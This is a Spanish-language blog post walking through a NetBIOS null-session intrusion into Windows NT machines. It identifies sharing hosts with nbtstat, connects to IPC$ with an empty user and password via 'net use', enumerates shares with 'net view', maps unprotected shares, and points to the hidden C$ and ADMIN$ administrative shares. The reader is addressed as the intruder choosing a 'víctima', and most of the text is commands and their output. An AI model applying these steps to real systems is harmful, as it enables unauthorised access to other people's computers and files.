Posted by Star | Posted in | Posted on 17:37
Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.
Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:
nbtstat -A 192.168.0.1
(si lo que conoces es
nbtstat -a nombre_del_PC
(si conoces solo su nombre)
pueden ocurrir varias cosas, si recibes:
C:\WINDOWS>nbtstat -A 192.168.0.1
Host not found.
Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)
Si la respuesta es:
C:\WINDOWS>nbtstat -A 192.168.0.1
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------------------------
NAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
NAME <03> UNIQUE Registered
MAC Address = 00-00-00-00-00-00
Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.
Si recibimos:
C:\WINDOWS>nbtstat -A 192.168.0.1
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------------------------
NAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
NAME <03> UNIQUE Registered
NAME <20> UNIQUE Registered
WORKGROUP <1e> GROUP Registered
MAC Address = 00-00-00-00-00-00
En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.
El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.
Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.
Para ello se utiliza el siguiente comando:
c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""
The command completed successfully.
Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET
C:\>net view \\192.168.0.1
recibirás algo así:
Shared resources at 192.168.0.1
Share name Type Used as Comment
----------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
Es posible que ocurra:
C:\>net view \\192.168.0.1
System error 5 has occurred.
Entonces primero tienes que establecer la "null session"
C:\>net use \\192.168.0.1\ipc$ "" /user:""
The command completed successfully.
Ahora el C:\>net view \\192.168.0.1
si funcionará
Para conectar a la carpeta compartida.
The command completed successfully.
Si escribes net use ahora, recibirás algo así:
Status Local Remote Network
-------------------------------------------------------------
OK X: \\123.123.123.123\test Microsoft
OK \\123.123.123.123\test Microsoft
The command completed successfully.
Para acceder directamente al PC solo tienes que:
*escribir en el explórer \\192.168.0.1
*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1
*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1
*En una ventana de símbolo de sistema escribir:
C:\>net use x: \\192.168.0.1\test
y después
C:\>dir x:
Este ataque solo funcionará si la carpeta compartida no tiene pasword.
Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.
Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT
crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).
También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).
Comments (0)
Publicar un comentario